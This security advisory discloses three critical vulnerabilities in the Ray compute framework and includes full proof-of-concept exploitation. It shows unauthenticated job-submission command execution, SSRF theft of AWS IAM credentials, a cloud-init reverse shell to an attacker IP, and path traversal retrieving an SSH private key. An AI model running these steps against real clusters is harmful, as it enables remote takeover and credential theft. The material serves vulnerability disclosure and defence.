Ray, Versions 2.6.3, 2.8.0

By: Berenice Flores Garcia, Senior Security Consultant

Security Vulnerability Gauge showing a critical severity reading.

The following document describes identified vulnerabilities in the Ray application version 2.6.3 and 2.8.0.

Update 12/4/2023

CORRECTION: The CVE IDs for the Missing Authentication and Server-Side Request Forgery vulnerabilities were swapped in the original version of the post. This has been corrected.

Vendor Response

Anyscale has released Ray version 2.8.1 and states the release addresses two of the three issues identified in the advisory: the Server-Side Request Forgery and Insecure Input Validation vulnerabilities. Authentication is not yet supported in Ray as of this update.

Bishop Fox recommends that Ray users deploy their clusters in isolated networks and control access using other mechanisms, such as SSH bastion hosts. If access to the Ray dashboard is required outside of an isolated network, Ray users could expose it via a reverse proxy service configured to require authentication.

Anyscale has published a blog post responding to this disclosure and has also updated their product documentation to warn users regarding the danger of exposing Ray services without additional security controls.

Product Vendor

Anyscale

Product Description

Ray is an open-source unified compute framework that makes it easy to scale AI and Python workloads. The project’s official website is www.ray.io and the official repository https://github.com/ray-project.... The latest version of the application is 2.8.1, released on December 1, 2023 at https://github.com/ray-project/ray/releases/tag/ray-2.8.1.

Vulnerabilities List

Bishop Fox notified Anyscale of three vulnerabilities in Ray on August 28, 2023. Near the end of Bishop Fox’s 90-day disclosure window, Protect AI revealed that they had previously reported two of the three vulnerabilities to Anyscale, but did not disclose those vulnerabilities until November 16, 2023. Bishop Fox is including details of all three vulnerabilities because our discussion of the issues differs from and complements Protect AI’s documentation.

Missing Authentication
Server-Side Request Forgery (SSRF) – first reported by Protect AI
Insecure Input Validation – first reported by Protect AI

These vulnerabilities are described in the following sections.

Affected Versions

Version 2.6.3 and 2.8.0

Summary of Findings

The Ray framework does not offer authentication and input validation in at least two of its components: Ray Dashboard and Ray Client. This makes it possible for unauthorized users to obtain operating system access to all nodes in the Ray cluster or attempt to retrieve Ray EC2 instance credentials (in a typical AWS cloud install).

Impact

A remote unauthorized user can obtain any data, scripts or files stored in the cluster. In addition, if the Ray framework is installed in the cloud (i.e. AWS), it is possible to retrieve highly privileged IAM credentials that allow privilege escalation. At the time of writing, the Ray GitHub repository has been forked over 4,900 times and the Ray Docker image has been pulled approximately five million times.

Solution

Anyscale has not addressed the vulnerabilities. Bishop Fox recommends that Ray users refrain from exposing the Ray network services to a local network or to the Internet.

Vulnerabilities

Missing Authentication

The APIs in two Ray components: Dashboard and Client, do not implement authentication controls. This lack of authentication mechanisms allows unauthorized actors to freely submit jobs, delete existing jobs, retrieve sensitive information, and achieve remote command execution. The vulnerability could be exploited to obtain operating system access to all nodes in the Ray cluster or attempt to retrieve Ray EC2 instance credentials. (in a typical AWS cloud install).

Vulnerability Details

CVE ID: CVE-2023-48022

Vulnerability Type: Missing Authentication for Critical Function

Access Vector: ☒ Remote, ☐ Local, ☐ Physical, ☐ Context dependent, ☐ Other (if other, please specify)

Impact: ☒ Code execution, ☐ Denial of service, ☐ Escalation of privileges, ☒ Information disclosure, ☐ Other (if other, please specify)

Security Risk: ☒ Critical, ☐ High, ☐ Medium, ☐ Low

Vulnerability: CWE-306, CWE-1211

In the default configuration, Ray does not enforce authentication. As a result, attackers may freely submit jobs, delete existing jobs, retrieve sensitive information, and exploit the other vulnerabilities described in this advisory. While the Ray documentation included an optional mutual TLS authentication mode, Ray does not appear to support an authorization model. In other words, even if a Ray administrator explicitly enabled TLS authentication, they would be unable to grant users different permissions, such as read-only access to the Ray Dashboard.

The most direct method of exploitation discovered is to submit arbitrary operating system commands for execution via the job submission API using a raw HTTP request or the Ray Jobs Python SDK. These do not require authentication in the default configuration, and are accessible remotely to any system with access to the Ray Dashboard (TCP port 8265 by default).

The figure below demonstrates crafting a JSON job submission to execute the Linux shell command cat /etc/passwd, sending the malicious JSON file to the jobs API, and then retrieving the output of the executed command:

$ cat cat_passwd.json                    

{
"entrypoint": "cat /etc/passwd",
"submission_id": "Bishop_Fox_00001",
"runtime_env": { },
"metadata": {},
"entrypoint_num_cpus": 1,
"entrypoint_num_gpus": 0,
"entrypoint_resources": {}
}

$ curl -v <a href="http://127.0.0.1:8265/api/jobs/" class="redactor-autoparser-object">http://127.0.0.1:8265/api/jobs...</a> -d @cat_passwd.json -H "Content-Type: application/json"
*   Trying 127.0.0.1:8265...
* Connected to 127.0.0.1 (127.0.0.1) port 8265 (#0)
> POST /api/jobs/ HTTP/1.1
> Host: 127.0.0.1:8265
> User-Agent: curl/8.1.2
> Accept: */*
> Content-Type: application/json
> Content-Length: 192

< HTTP/1.1 200 OK
< Content-Type: application/json; charset=utf-8
< Content-Length: 67
< Date: Mon, 06 Nov 2023 14:48:30 GMT
< Server: Python/3.8 aiohttp/3.8.6
< 
* Connection #0 to host 127.0.0.1 left intact
{"job_id": "Bishop_Fox_00001", "submission_id": "Bishop_Fox_00001"}%

$ curl <a href="http://127.0.0.1:8265/api/jobs/Bishop_Fox_00001/logs" class="redactor-autoparser-object">http://127.0.0.1:8265/api/jobs...</a>
{"logs": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\nray:x:1000:100::/home/ray:/bin/bash\nmessagebus:x:101:102::/nonexistent:/usr/sbin/nologin\n"}%

FIGURE 1 - Executing arbitrary operating system commands via the job API

Protect AI published a MetaSploit Framework module that exploits this technique along with their disclosure, although they did not call out the lack of authentication as a vulnerability. Researcher Bryce Bearchell independently submitted two reports to Protect AI’s huntr platform (https://huntr.com/bounties/787a07c0-5535-469f-8c53-3efa4e5717c7/ and https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/) during the same time period that Bishop Fox reported the issue directly to Anyscale. However, the reports were closed based on Anyscale’s position that the behavior is by design, and therefore should not be perceived as a vulnerability.

The Ray Jobs Python SDK can also be used to execute code remotely without authentication. The arbitrary command execution is obtained by crafting a malicious Python script using the Ray API to submit a task and then calling this malicious script in the entrypoint parameter of the JobSubmissionClient object, as shown below:

$ cat malicious.py
import ray
import os

@ray.remote
def compromise_system():
os.system(‘cat /etc/passwd’)

# Automatically connect to the running Ray cluster.
Ray.init()
print(ray.get(compromise_system.remote()))

$ cat jobs.py
from ray.job_submission import JobSubmissionClient, JobStatus
import time

# If using a remote cluster, replace 127.0.0.1 with the head node’s IP address.
Client = JobSubmissionClient(“http://127.0.0.1:8265”)
job_id = client.submit_job(
# Entrypoint shell command to execute
entrypoint=”python malicious.py”,
# Path to the local directory that contains the script.py file
runtime_env={“working_dir”: “./”}
)
print(job_id)

def wait_until_status(job_id, status_to_wait_for, timeout_seconds=5):
start = time.time()
while time.time() – start <= timeout_seconds:
status = client.get_job_status(job_id)
print(f”status: {status}”)
if status in status_to_wait_for:
break
time.sleep(1)


wait_until_status(job_id, {JobStatus.SUCCEEDED, JobStatus.STOPPED, JobStatus.FAILED})
logs = client.get_job_logs(job_id)
print(logs)

FIGURE 2 - Scripts to obtain command execution using Ray Jobs Python SDK

Executing the jobs.py script on a device with network connectivity to the Ray API causes the malicious task script to execute on a Ray cluster node and retrieve the output of system command cat /etc/passwd, as shown below:

$ python3 jobs.py
2023-11-06 08:52:00,027    INFO dashboard_sdk.py:385 – Package gcs://_ray_pkg_04ff8aa220c33990.zip already exists, skipping upload.
Raysubmit_Nzy7wuitcjm1Dy7n
status: PENDING
status: PENDING
status: RUNNING
status: RUNNING
status: RUNNING
(compromise_system pid=693) root:x:0:0:root:/root:/bin/bash
(compromise_system pid=693) daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
(compromise_system pid=693) bin:x:2:2:bin:/bin:/usr/sbin/nologin
(compromise_system pid=693) sys:x:3:3:sys:/dev:/usr/sbin/nologin
(compromise_system pid=693) sync:x:4:65534:sync:/bin:/bin/sync
(compromise_system pid=693) games:x:5:60:games:/usr/games:/usr/sbin/nologin
(compromise_system pid=693) man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
(compromise_system pid=693) lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
(compromise_system pid=693) mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
(compromise_system pid=693) news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
(compromise_system pid=693) uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
(compromise_system pid=693) proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
(compromise_system pid=693) www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
(compromise_system pid=693) backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
(compromise_system pid=693) list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
(compromise_system pid=693) irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
(compromise_system pid=693) gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
(compromise_system pid=693) nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
(compromise_system pid=693) _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
(compromise_system pid=693) ray:x:1000:100::/home/ray:/bin/bash
(compromise_system pid=693) messagebus:x:101:102::/nonexistent:/usr/sbin/nologin

FIGURE 3 - Remote command execution via Ray Jobs Python SDK

Additionally, the Ray Client API – exposed on TCP port 10001 by default – is vulnerable to unauthenticated remote code execution via a very similar technique:

$ cat malicious_init.py 

import ray 
import os

@ray.remote
def compromise_system():
os.system(‘cat /etc/passwd’)

# Automatically connect to the running Ray cluster.
Ray.init(address=”ray://<ray_cluster_head_ip>:10001”)
print(ray.get(compromise_system.remote())) 

(ray_env-3.8) > $ python3 malicious_init.py
(compromise_system pid=1038) root:x:0:0:root:/root:/bin/bash
(compromise_system pid=1038) daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
(compromise_system pid=1038) bin:x:2:2:bin:/bin:/usr/sbin/nologin
(compromise_system pid=1038) sys:x:3:3:sys:/dev:/usr/sbin/nologin
…omitted for brevity…
(compromise_system pid=1038) nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
(compromise_system pid=1038) _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
(compromise_system pid=1038) ray:x:1000:100::/home/ray:/bin/bash
(compromise_system pid=1038) messagebus:x:101:102::/nonexistent:/usr/sbin/nologin

FIGURE 4 - Scripts to obtain command execution using Ray Client API

As shown above, the Ray Client API is also vulnerable to arbitrary, unauthenticated command execution, as demonstrated by reading the content of the /etc/passwd file. Bishop Fox does not believe this variation on the overall vulnerability has been disclosed previously.

Researcher Bryce Bearchell submitted a separate variation on this issue to Protect AI on August 30, 2023. That additional variant affects a different Ray API, running on port 52365.

An attacker can use the above techniques to obtain operating system access to all nodes in the Ray cluster, or attempt to retrieve Ray EC2 instance credentials, as discussed in the SSRF finding of this advisory.

Server-Side Request Forgery (SSRF)

The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid. The issue is exploitable without authentication and is dependent only on network connectivity to the Ray Dashboard port (8265 by default). The vulnerability could be exploited to retrieve the highly privileged IAM credentials required by Ray from the AWS metadata API.

This vulnerability was also reported by researcher Harry Ha to Protect AI on July 21^st, 2022, but the report was not made public until November 2023.

Vulnerability Details

CVE ID: CVE-2023-48023

Vulnerability Type: Server-Side Request Forgery (SSRF)

Access Vector: ☒ Remote, ☐ Local, ☐ Physical, ☐ Context dependent, ☐ Other (if other, please specify)

Impact: ☒ Code execution, ☐ Denial of service, ☒ Escalation of privileges, ☒ Information disclosure, ☐ Other (if other, please specify)

Security Risk: ☒ Critical, ☐ High, ☐ Medium, ☐ Low

Vulnerability: CWE-441, CWE-918

An SSRF vulnerability was identified in the Ray Dashboard API that can be used to proxy any HTTP or HTTPS request to another system via the Ray API. Bishop Fox staff demonstrated exploiting the vulnerability to retrieve the highly privileged IAM credentials required by Ray from the AWS metadata API. This issue was exploitable without authentication and requires network connectivity to the Ray Dashboard port (8265 by default).

The URL parameter of the /log_proxy API endpoint did not perform sufficient input validation and accepted any HTTP or HTTPS URLs as valid. As a result, an attacker could proxy any HTTP or HTTPS GET request through the API.
Bishop Fox demonstrated the impact of this vulnerability in a typical cloud install of Ray by using it to retrieve IAM credentials from the AWS metadata endpoint, as shown below:

$ curl -v "http://127.0.0.1:8265/log_proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ray-autoscaler-v1" 
*   Trying 127.0.0.1:8265...
* Connected to 127.0.0.1 (127.0.0.1) port 8265 (#0)
> GET /log_proxy?url=<a href="http://169.254.169.254/latest/meta-data/iam/security-credentials/ray-autoscaler-v1" class="redactor-autoparser-object">http://169.254.169.254/latest/...</a> HTTP/1.1
> Host: 127.0.0.1:8265
> User-Agent: curl/8.1.2
> Accept: */*
> 
< HTTP/1.1 200 OK
< Host: 127.0.0.1:8265
< User-Agent: curl/8.1.2
< Accept: */*
< Content-Length: 1582
< Content-Type: text/plain
< Date: Mon, 06 Nov 2023 15:10:11 GMT
< Server: Python/3.8 aiohttp/3.8.6
< 
{
 "Code" : "Success",
 "LastUpdated" : "2023-11-06T15:06:00Z",
 "Type" : "AWS-HMAC",
 "AccessKeyId" : "ASIA53DUJ[REDACTED]",
 "SecretAccessKey" : "G15CQ8w3ODFCuUacTLCy2TcvfgwJwcC9V01Ah/Ts",
 "Token" : "IqoJb3JpZ2luX2VjEFcaCXVzLXdlc3Q[REDACTED]",
 "Expiration" : "2023-11-06T21:34:13Z" 

$ export AWS_ACCESS_KEY_ID= ASIA53DUJ[REDACTED]
$ export AWS_SECRET_ACCESS_KEY=MWS17V0UhqF0oDePjtEWb40W/L[REDACTED] 
$ export AWS_SESSION_TOKEN=IqoJb3JpZ2luX2VjECcaCXVzLXdlc3QtMiJIMEYCIQDADGR9ZodfTT1yr0 [REDACTED] 
$ aws sts get-caller-identity 
{
"UserId": "AROA[REDACTED]:i-[REDACTED]",
"Account": "[REDACTED]",
"Arn": "arn:aws:sts::[REDACTED]:assumed-role/ray-autoscaler-v1/i-[REDACTED]" }

FIGURE 5 - Retrieving and validating IAM EC2 instance credentials associated with the Ray server

As discussed in the Ray documentation, Ray nodes are, by default, are granted full EC2 and S3 permissions.

FIGURE 6 - Documentation regarding Ray’s default EC2 and S3 permissions

The implications of retrieving the Ray EC2 instance credentials is that an attacker can modify an existing EC2 instance in the cloud environment to connect back to an attacking system at boot, as shown below:

$ cat b64code.txt

Content-Type: multipart/mixed; boundary=”//”
MIME-Version: 1.0
--//
Content-Type: text/cloud-config; charset=”us-ascii”
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename=”cloud-config.txt”
#cloud-config
cloud_final_modules:
- [scripts-user, always]
--//
Content-Type: text/x-shellscript; charset=”us-ascii”
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename=”userdata.txt”
#!/bin/bash
bash -I >& /dev/tcp/<ATTACKER-IP>/7733 0>&1
--//%

$ cat b64code.txt | base64 > file_encoded.txt

$ aws ec2 modify-instance-attribute --instance-id ”i-05f[REDACTED” --attribute userData --value file:///path/to/file/file_encoded.txt

$ aws ec2 start-instances --instance-ids i-05f[REDACTED]

FIGURE 7 - Using captured credentials to apply a malicious configuration to an existing instance

As shown in the following figure, a netcat listener received a connection from the instance running in the context of the root user:

$ nc -l 7733 

bash: cannot set terminal process group (1364): Inappropriate ioctl for device bash: no job control in this shell
root@ip-172-31-38-107:/# id
uid=0(root) gid=0(root) groups=0(root)

FIGURE 8 - Reverse TCP shell connection from modified EC2 instance

An attacker could proxy other HTTP traffic through a vulnerable Ray instance to mask the true source of malicious traffic.

Insecure Input Validation

The Ray Dashboard API is affected by an Insecure Input Validation vulnerability in the filename parameter of the /api/v0/logs/file API endpoint. The API does not perform sufficient input validation within the affected parameter and any arbitrary filesystem path is accepted as valid. The issue is exploitable without authentication, but is dependent on network connectivity to the Ray Dashboard port (8265 by default). The vulnerability could be exploited to retrieve sensitive filesystem such as the SSH private key used by Ray to authenticate to other nodes in the associated cluster.

This vulnerability was also reported to Protect AI by researcher Dan McInerney on August 24^th, 2023, but the report was not made public until November 16, 2023.

Vulnerability Impact Analysis

CVE ID: CVE-2023-6021

Vulnerability Type: Insecure Input Validation

Access Vector: ☒ Remote, ☐ Local, ☐ Physical, ☐ Context dependent, ☐ Other (if other, please specify)

Impact: ☒ Code execution, ☐ Denial of service, ☐ Escalation of privileges, ☒ Information disclosure, ☐ Other (if other, please specify)

Security Risk: ☒ Critical, ☐ High, ☐ Medium, ☐ Low

Vulnerability: CWE-20, CWE-73

An insecure input validation is present in the Ray Dashboard’s /api/v0/logs/file API endpoint. The endpoint accepts arbitrary filesystem paths and does not require authentication, only connectivity to the Ray Dashboard port (8265 by default). The vulnerability was exploited to obtain the SSH private key used by Ray to authenticate to all other nodes in the associated cluster.

To trigger the vulnerability, a valid node_id value was required. A node_id could be obtained in the Cluster section of the Ray Dashboard web app in the ID column of the Node List section. In the figure below, the ID of the head node is f3a532dccac4c7fc7a51a82521022f3077bcbf5d03e160502c34a82c

FIGURE 9 - Obtaining a node_id value via the Ray Dashboard

It is also possible to obtain the node ID calling the Dashboard API /nodes?view=summary as shown below:

$ curl -s "http://127.0.0.1:8265/nodes?view=summary" | jq -r '.data.summary[].raylet | select(.isHeadNode==true) | .nodeId'
f3a532dccac4c7fc7a51a82521022f3077bcbf5d03e160502c34a82c

FIGURE 10 - Obtaining a node_id value via the Ray Dashboard API

If a valid node_id value is included in the request, the Ray Dashboard API returns the content of any file accessible to the account the web application server is running as. For example, in response to a curl command, the API returns the content of the server’s /etc/passwd file, as shown below:

$ export node_id=$(curl -s "http://127.0.0.1:8265/nodes?view=summary" | jq -r '.data.summary[].raylet | select(.isHeadNode==true) | .nodeId')

$ curl "http://127.0.0.1:8265/api/v0/logs/file?node_id=$node_id&filename=/etc/passwd&lines=100"
1root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
ray:x:1000:100::/home/ray:/bin/bash
messagebus:x:101:102::/nonexistent:/usr/sbin/nologin

FIGURE 11 - Reading /etc/passwd file remotely

In a typical AWS cloud install, one can find a bootstrap config file in the home directory of the ray user. This bootstrap config file contains various details such as the cluster settings, including the full filesystem path where an SSH key is stored.

After obtaining the home directory of the ray user from the /etc/passwd file, it is possible to exploit the same vulnerability to retrieve the Ray bootstrap configuration file. As shown below, the bootstrap configuration file contained the path to an SSH private key:

$ curl "http://127.0.0.1: 8265/api/v0/logs/file?node_id=$node_id&filename=/home/ray/ray_bootstrap_config.yaml&lines=100"

1{"cluster_name": "default", "max_workers": 2, "upscaling_speed": 1.0, "docker": {"image":"rayproject/ray-ml:latest-gpu", "container_name": "ray_container", "pull_before_run": true, "run_options": ["--ulimit nofile=65536:65536"]}, "idle_timeout_minutes": 5, "provider":{"type": "aws", "region": "us-west-2", "availability_zone": "us-west-2a,us-west-2b", "cache_stopped_nodes": true}, "auth": {"ssh_user": "ubuntu", "ssh_private_key": "~/ray_bootstrap_key.pem"}, "available_node_types": {"ray.head.default": {"resources": {"CPU": 2}, "node_config": {"InstanceType": "m5.large", "ImageId": "ami-0387d929287ab193e",…omitted for brevity…

FIGURE 12 - Retrieving bootstrap configuration file

The SSH private key is used by Ray for communication between cluster nodes. It is possible to read the private key content using the same vulnerable API, and then, use it to access cluster nodes via SSH, as shown below:

$ curl "http://127.0.0.1:8265/api/v0/logs/file?node_id=$node_id&filename=/home/ray/ray_bootstrap_key.pem&lines=100"

1-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAg9OtaoHqoL9K6...[REDACTED]...aXL+Un1sWrVzk6gXkdg
gOKVcn5aN6or5SW3XQCye8H1qdhMMbtxr9wz6ddr92XsUieEOOcktg==
-----END RSA PRIVATE KEY-----

$ ssh -i <captured_key> ubuntu@<public_ray_dashboard_ip>

=============================================================================
__| __|_ )
_| ( / Deep Learning AMI (Ubuntu 18.04) Version 61
___|\___|___|
=============================================================================
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 5.4.0-1075-aws x86_64v)
Please use one of the following commands to start the required environment with the framework of your choice:
for TensorFlow 2.7 with Python3.8 (CUDA 11.2 and Intel MKL-DNN) _____________ source activate tensorflow2_p38
…omitted for brevity…
ubuntu@ip-172-31-37-231:~$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(lxd),114(netdev),998(docker)

FIGURE 13 - Retrieving and validating SSH private key

As demonstrated above, this vulnerability could be leveraged to compromise an entire Ray cluster.

Credits

Berenice Flores, Senior Security Consultant I, Bishop Fox ([email protected])

Timeline

08/22/2023: Initial discovery
08/28/2023: Contact with vendor
08/29/2023: Vendor acknowledged vulnerabilities
11/27/2023: Vulnerabilities publicly disclosed
12/4/2023: Public disclosure updated to reflect the latest developments from Vendor

Subscribe to our blog and advisories

Be first to learn about latest tools, advisories, and findings.

Scoring high in the GigaOm Radar for the fourth year in a row!

See Why We're the Leaders in Offensive Security

The State of Offensive Security

The Best Defense is a Great Offense

Want to Work with the Best Minds in Offensive Security?

Ray, Versions 2.6.3, 2.8.0

Update 12/4/2023

Vendor Response

Product Vendor

Product Description

Vulnerabilities List

Affected Versions

Summary of Findings

Impact

Solution

Vulnerabilities

Missing Authentication

Vulnerability Details

Server-Side Request Forgery (SSRF)

Vulnerability Details

Insecure Input Validation

Vulnerability Impact Analysis

Credits

Timeline

Recommended Posts

You might be interested in these related posts.